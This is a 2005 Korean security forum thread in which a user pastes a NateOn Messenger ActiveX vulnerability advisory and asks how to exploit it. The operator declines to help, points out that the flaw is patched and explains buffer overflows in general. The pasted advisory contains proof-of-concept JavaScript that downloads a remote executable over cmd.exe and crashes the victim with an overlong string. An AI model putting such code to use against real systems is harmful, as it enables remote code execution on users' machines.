|
커피향이 나는 *NIX
커피닉스
시스템/네트웍/보안을 다루는 곳
|
|
|
|
| 이전 주제 보기 :: 다음 주제 보기 |
| 글쓴이 |
메시지 |
쭈니더슬퍼 손님
|
올려짐: 2005.12.06 화, 12:15 am 주제: 헤헤 운영자분이 친절하시고 좋네요... |
|
|
네이트온 때문에요...
뭐 한가지 더 물어볼께요...
구글 검색하다가 본건데여...
▶네이트온 다중 보안 취약점 권고문네이트온 다중 취약점
권고문이 발표되었습니다.
역시 지난번에 네이트온 보안 취약점 권고문을
발표한 박규태 씨가 발견한 것이군요.
임의의 파일을 업로드 할 수 있는 취약점과 버퍼오버플로우 취약점의 결합이라
면 피해자의 서버에 악성 프로그램을 업로드하여 실행시키는 공격 시나리오가
가능하겠군요.◀
어디에 따른 취약점 일까요?
또 이 취약점으로 접근하려면 어떻게 해야하고... 버퍼오버플러우는
무엇인가요?
버퍼가 넘쳐난다 이런뜻인가여?
이건 펀글 이예요...
This is a multi-part message in MIME format.
--===============2108474384==
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_009F_01C5C4EA.07FD7690"
This is a multi-part message in MIME format.
------=_NextPart_000_009F_01C5C4EA.07FD7690
Content-Type: text/plain;
charset="ks_c_5601-1987"
Content-Transfer-Encoding: 7bit
Title: Arbitrary File Download by NateOn Messagener's ActiveX
and DoS
Discoverer: PARK, GYU TAE (saintlinu@null2root.org)
Advisory No.: NRVA05-08
Critical: Moderately Critical
Impact: Arbitrary file download by NateOn Messagener's ActiveX
and DoS
Where: From remote
Operating System: Windows Only
Solution: unpatch yet
Workaround: N / A
Notice: 09. 17. 2005 Initiate notified
09. 23. 2005 2nd notified
09. 27. 2005 3rd notified
09. 29. 2005 Vendor didn't response. Disclosure
vulnerability
Description:
The NateOn Messenger(See a NRVA05-02) is Internet Instance Messenger such
as MSN, YAHOO and so on
If installed NateOn Messenger then can exploit by
'NateonDownloadManager.ocx' ActiveX
and there is another vulnerability like Buffer Overflow
See following detail describe:
NOT INCLUDED HERE BUT A PIECE OF CODE
<--snip-->
i = GotNate.IsNateonInstall();
if( i == 1 ) {
alert('NateOn Messenger already installed. Do
Attack ...');
// if you want to second order attack then try
i =
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','c:\\windows\\
system32\\cmd.exe');
// if you want to crash to victim system the try
i =
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','very_long_str
ings_in_here');
} else {
alert('NateOn Messenger NOT Installed');
}
</--snip-->
------=_NextPart_000_009F_01C5C4EA.07FD7690
Content-Type: text/html;
charset="ks_c_5601-1987"
Content-Transfer-Encoding: quoted-printable
<html xmlns:o=3D"urn:schemas-microsoft-com:office:office" =
xmlns:w=3D"urn:schemas-microsoft-com:office:word" =
xmlns=3D"http://www.w3.org/TR/REC-html40">
<head>
<meta http-equiv=3DContent-Type content=3D"text/html; =
charset=3Dks_c_5601-1987">
<meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)">
<style>
<!--
/* Font Definitions */
@font-face
{font-family:=B9=D9=C5=C1;
panose-1:2 3 6 0 0 1 1 1 1 1;}
@font-face
{font-family:=B1=BC=B8=B2;
panose-1:2 11 6 0 0 1 1 1 1 1;}
@font-face
{font-family:"\@=B1=BC=B8=B2";
panose-1:2 11 6 0 0 1 1 1 1 1;}
@font-face
{font-family:"\@=B9=D9=C5=C1";
panose-1:2 3 6 0 0 1 1 1 1 1;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0cm;
margin-bottom:.0001pt;
text-align:justify;
text-justify:inter-ideograph;
text-autospace:none;
word-break:break-hangul;
font-size:10.0pt;
font-family:=B9=D9=C5=C1;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;}
span.EmailStyle17
{mso-style-type:personal-compose;
font-family:=B1=BC=B8=B2;
color:windowtext;}
/* Page Definitions */
@page Section1
{size:595.3pt 841.9pt;
margin:99.25pt 3.0cm 3.0cm 3.0cm;
layout-grid:18.0pt;}
div.Section1
{page:Section1;}
-->
</style>
</head>
<body lang=3DKO link=3Dblue vlink=3Dpurple>
<div class=3DSection1 style=3D'layout-grid:18.0pt'>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Title:  =
;
Arbitrary File Download by NateOn Messagener's ActiveX and =
DoS<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Discoverer: =
PARK, GYU
TAE (saintlinu@null2root.org)<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Advisory No.: =
NRVA05-08<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Critical: &n=
bsp;
Moderately Critical<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Impact: &nbs=
p;
Arbitrary file download by NateOn Messagener's ActiveX and =
DoS<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Where:  =
;
>From remote<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Operating System: Windows =
Only<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Solution: &n=
bsp;
unpatch yet<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Workaround: =
N / A<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Notice: &nbs=
p;
09. 17. 2005 Initiate notified<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'> =
&=
nbsp; 09.
23. 2005 2nd notified<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
;
09. 27. 2005 3rd notified<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
;
09. 29. 2005 Vendor didn't response. Disclosure =
vulnerability<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Description: <o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>The NateOn Messenger(See a NRVA05-02) is =
Internet Instance
Messenger such as MSN, YAHOO and so on<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>If installed NateOn Messenger then can exploit =
by
'NateonDownloadManager.ocx' ActiveX<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>and there is another vulnerability like Buffer =
Overflow<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>See following detail =
describe:<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>NOT INCLUDED HERE BUT A PIECE OF =
CODE<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><--snip--><o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; i
=3D GotNate.IsNateonInstall();<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; <o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; if(
i =3D=3D 1 ) {<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; =
alert('NateOn
Messenger already installed. Do Attack =
...');<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; =
//
if you want to second order attack then try<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; =
i
=3D
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','=
c:\\windows\\system32\\cmd.exe');<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; =
<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; =
//
if you want to crash to victim system the =
try<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; =
</span></font><font
face=3D=B1=BC=B8=B2><span style=3D'font-family:=B1=BC=B8=B2'>i =3D
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','=
very_long_strings_in_here');<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; }
else {<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; =
</span></font><font
face=3D=B1=BC=B8=B2><span lang=3DEN-US =
style=3D'font-family:=B1=BC=B8=B2'>alert('NateOn Messenger NOT
Installed');<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; }<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'></--snip--><o:p></o:p></span></font></p>
</div>
</body>
</html>
------=_NextPart_000_009F_01C5C4EA.07FD7690--
________________________________________________________ |
|
| 위로 |
|
 |
truefeel 카페 관리자
가입: 2003년 7월 24일 올린 글: 1277 위치: 대한민국
|
올려짐: 2005.12.11 일, 12:44 am 주제: Re: 헤헤 운영자분이 친절.... (네이트온 관련) |
|
|
제목 보고 어떤 것을 질문한 것인지 전혀 알 수가 없습니다. 글 제목은 보다 알기쉽게 써주세요.
저 제목이라면 자유게시판에 어울릴 것 같습니다. ^^
| 쭈니더슬퍼 씀: | 네이트온 때문에요...
뭐 한가지 더 물어볼께요...
구글 검색하다가 본건데여...
▶네이트온 다중 보안 취약점 권고문네이트온 다중 취약점
권고문이 발표되었습니다.
역시 지난번에 네이트온 보안 취약점 권고문을
발표한 박규태 씨가 발견한 것이군요.
임의의 파일을 업로드 할 수 있는 취약점과 버퍼오버플로우 취약점의 결합이라
면 피해자의 서버에 악성 프로그램을 업로드하여 실행시키는 공격 시나리오가
가능하겠군요.◀
어디에 따른 취약점 일까요?
또 이 취약점으로 접근하려면 어떻게 해야하고...
|
이전에도 질문을 올리셨지만 네이트온, 싸이를 좋지 않는 방향으로 사용하려는 의도가 많으시네요.
이런 부분에 대해 집착하지 마세요.
네이트온의 보안문제에 대해서는 null@root의 박규철씨가 2-3번 정도 발표한 적이 있습니다.
네이트온의 파일공유기능의 문제로 공유하지 않은 파일에 대해서도 접근할 수 있었던 문제도 있었습니다.
http://secunia.com/advisories/15819/
http://secunia.com/advisories/16983/
하지만 이제 위의 취약점으로 접근하는 것은 안된다라고 보시면 됩니다.
자동업데이트가 되기 때문에.
| 쭈니더슬퍼 씀: |
버퍼오버플러우는 무엇인가요?
버퍼가 넘쳐난다 이런뜻인가여? |
버퍼오버플로우(Buffer Overflow)는 버퍼(데이터를 임시 정하는 공간으로 보시면 됩니다.)크기보다 더 큰 데이터를 보내서 버퍼를 채우는 것(overflow)을 말합니다.
그런데, 함수 호출을 하게 되면 회신 주소(return address)가 버퍼(스택)에 push됩니다.
이 때 공격자가 오버플로우 문제를 통해 회신주소를 공격자가 지정한 주소로 바꾸게 되면 어떻게 될까요?
공격자의 악의적 코드가 들어있는 주소로 return이 되고 그 코드들이 실행이 될겁니다.
root 권한을 얻을 수도 있고, 임의 프로그램을 실행할 수도 있는 것입니다.
버퍼 오버플로우에 대해서는
* 보안(security) > 보안문서 - 해킹 / 공격 ( http://coffeenix.net/?cata_code=88 ) 카테고리나
* 구글링을 해보면 많이 나올겁니다. |
|
| 위로 |
|
 |
|
|
새로운 주제를 올릴 수 없습니다 답글을 올릴 수 없습니다 주제를 수정할 수 없습니다 올린 글을 삭제할 수 없습니다 투표를 할 수 없습니다
|
Powered by phpBB © 2001, 2005 phpBB Group
|